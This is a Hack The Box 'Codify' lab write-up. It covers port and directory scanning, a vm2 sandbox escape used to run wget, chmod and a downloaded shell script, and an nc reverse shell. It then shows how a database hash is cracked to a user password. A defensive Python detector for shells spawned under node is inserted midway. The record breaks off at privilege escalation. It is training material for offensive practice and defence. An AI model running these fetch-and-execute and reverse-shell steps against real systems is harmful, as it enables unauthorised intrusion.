Codify Lab
Hack the Box Penetration Lab
Reconnaissance
First up, a port scan:
┌──(zero㉿kali)-[~]
└─$ rustscan -a 10.10.11.239
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
😵 https://admin.tryhackme.com
[~] The config file is expected to be at "/home/zero/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 10.10.11.239:22
Open 10.10.11.239:80
Open 10.10.11.239:3000
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-25 06:53 PST
Initiating Ping Scan at 06:53
Scanning 10.10.11.239 [2 ports]
Completed Ping Scan at 06:53, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 06:53
Completed Parallel DNS resolution of 1 host. at 06:53, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 06:53
Scanning 10.10.11.239 [3 ports]
Discovered open port 80/tcp on 10.10.11.239
Discovered open port 22/tcp on 10.10.11.239
Discovered open port 3000/tcp on 10.10.11.239
Completed Connect Scan at 06:53, 0.08s elapsed (3 total ports)
Nmap scan report for 10.10.11.239
Host is up, received syn-ack (0.054s latency).
Scanned at 2024-02-25 06:53:39 PST for 0s
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
80/tcp open http syn-ack
3000/tcp open ppp syn-ack
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.18 seconds
A quick rustscan revealed 3 open ports: 22, which is SSH; 80, which is HTTP; and 3000, which appears to host the Node.js Express framework.
A website URL was also revealed by a quick nmap scan: codify.htb, which appears to be a place to check Node.js code. It allows you to enter your own code into an editor and see the output. It says it executes the code in a sandbox environment, but this could potentially be used for manipulation.
I then performed a Fuzzscan:
┌──(zero㉿kali)-[~]
└─$ feroxbuster -u http://codify.htb -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -k
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.10.1
───────────────────────────┬──────────────────────
🎯 Target Url │ http://codify.htb
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.10.1
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔓 Insecure │ true
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 10l 15w -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 61l 199w 2665c http://codify.htb/limitations
200 GET 119l 246w 3123c http://codify.htb/editor
200 GET 50l 282w 2921c http://codify.htb/about
200 GET 38l 239w 2269c http://codify.htb/
200 GET 119l 246w 3123c http://codify.htb/Editor
200 GET 50l 282w 2921c http://codify.htb/About
403 GET 9l 28w 275c http://codify.htb/server-status
200 GET 50l 282w 2921c http://codify.htb/ABOUT
[####################] - 70s 30006/30006 0s found:8 errors:5
[####################] - 70s 30000/30000 430/s http://codify.htb/
There didn't seem to be any hidden URLs on this scan, so I went hunting a little to try and get some extra information. The website did list some restrictions when using the tool, limiting some JS modules, as well as some modules that are whitelisted.
I then went ahead and performed another scan, this time for subdomains. The scan revealed nothing.
The next thing I wanted to try was to test out the Editor. I loaded up BurpSuite and set everything up to capture what happens when you hit the run button. Nothing crazy seemed to happen.
After looking around the site some more I found that the editor uses the vm2 library for sandboxing JS. This was the spring board I needed.
After a little bit of searching, I found that this particular version has an exploit for breaking out of the sandbox and spawning a shell.
https://gist.github.com/leesh3288/e4aa7b90417b0b0ac7bcd5b09ac7d3bd
Now to modify the code and try to execute it inside the editor. I got a little confused as to what part of the code to edit. But after some research, we need to modify execSync and pass through some code of our own.
Let's just upload a bash file via this code then execute it.
I used this code to upload the file:
wget http://[IP]/shell.sh
And this code to make sure I could execute it and then execute the shell:
chmod +x shell.sh
./shell.sh
Admittedly I made quite a stupid mistake at this point. I had executed the file about 4 times and wondered why I wasn't getting access to the system, only to realise that I had set up a hosting server on one of my ports, not an nc listener to listen for the shell to execute... so anyway, after that 10 minute mistake I got in.
┌──(zero㉿kali)-[~]
└─$ nc -lvnp 9001
listening on [any] 9001 ...
connect to [] from (UNKNOWN) [10.10.11.239] 52482
bash: cannot set terminal process group (1250): Inappropriate ioctl for device
bash: no job control in this shell
svc@codify:~$
Here are my shells I kept modifying to try and sort the issue LMAO:

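From the defender's side, the chain above (the Node.js editor process running as svc, spawning a shell that downloads, chmods and runs a script) leaves a recognisable process tree. The following is an added example, not code from the write-up or from the box: it walks a constructed, simplified process-creation log and flags any shell or downloader whose ancestry leads back to the node process. The log format, the "index.js" command line and the cron entry are assumptions made up for the example.

```python
"""Flag shell/downloader processes descended from the sandboxed node app.

Added example, not part of the original write-up. Input is a constructed,
simplified process-creation log (one JSON object per line) modelled on what a
host sensor could emit when the vm2 escape runs wget/chmod/./shell.sh via
execSync from the editor's node process running as 'svc'.
"""
import json

# Constructed sample events; pids, paths and the cron line are invented.
SAMPLE_LOG = """\
{"pid": 1250, "ppid": 1,    "user": "svc",  "comm": "node",  "cmdline": "node index.js"}
{"pid": 1301, "ppid": 1250, "user": "svc",  "comm": "sh",    "cmdline": "sh -c wget http://[IP]/shell.sh"}
{"pid": 1302, "ppid": 1301, "user": "svc",  "comm": "wget",  "cmdline": "wget http://[IP]/shell.sh"}
{"pid": 1310, "ppid": 1250, "user": "svc",  "comm": "sh",    "cmdline": "sh -c chmod +x shell.sh"}
{"pid": 1320, "ppid": 1250, "user": "svc",  "comm": "sh",    "cmdline": "sh -c ./shell.sh"}
{"pid": 1321, "ppid": 1320, "user": "svc",  "comm": "bash",  "cmdline": "bash -i"}
{"pid": 2000, "ppid": 1,    "user": "root", "comm": "cron",  "cmdline": "/usr/sbin/cron -f"}
{"pid": 2001, "ppid": 2000, "user": "root", "comm": "sh",    "cmdline": "sh -c mysql-backup.sh"}
"""

# A web app that only evaluates user JS inside a sandbox has no business
# spawning any of these; seeing one under the node process is the signal.
SUSPICIOUS = {"sh", "bash", "dash", "wget", "curl", "chmod"}


def parse_events(text):
    """Parse the newline-delimited JSON log into a list of event dicts."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def ancestors(event, by_pid):
    """Yield the comm of each ancestor of `event`, nearest parent first."""
    ppid = event["ppid"]
    while ppid in by_pid:
        parent = by_pid[ppid]
        yield parent["comm"]
        ppid = parent["ppid"]


def find_sandbox_escapes(events, app_comm="node"):
    """Return events whose comm is suspicious and which descend from app_comm."""
    by_pid = {e["pid"]: e for e in events}
    return [e for e in events
            if e["comm"] in SUSPICIOUS and app_comm in ancestors(e, by_pid)]


if __name__ == "__main__":
    for hit in find_sandbox_escapes(parse_events(SAMPLE_LOG)):
        print(f"ALERT pid={hit['pid']} user={hit['user']} cmd={hit['cmdline']}")
```

The root-owned cron-driven sh is deliberately not flagged, since it does not descend from the node process; the same walk works on real auditd or Sysmon-for-Linux events once the field names are mapped.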
Doing my usual quick search for whoami, id and checking the different users, I found a user called joshua who had the same permissions as root.

Slightly stumped, I just poked around the system a little and noticed that inside /var/www/contact there was a file called tickets.db; this would be an interesting database to look into. After using cat on the file I found some sort of hash next to joshua.
There we have it! Looks like the password for joshua is spongebob1. Let's log in and see what we can find!

Found the user flag! Now it's time to try and get root access!
The first thing I checked was what joshua could run as sudo. It turns out there is 1 script that could be run, called mysql-backup.sh.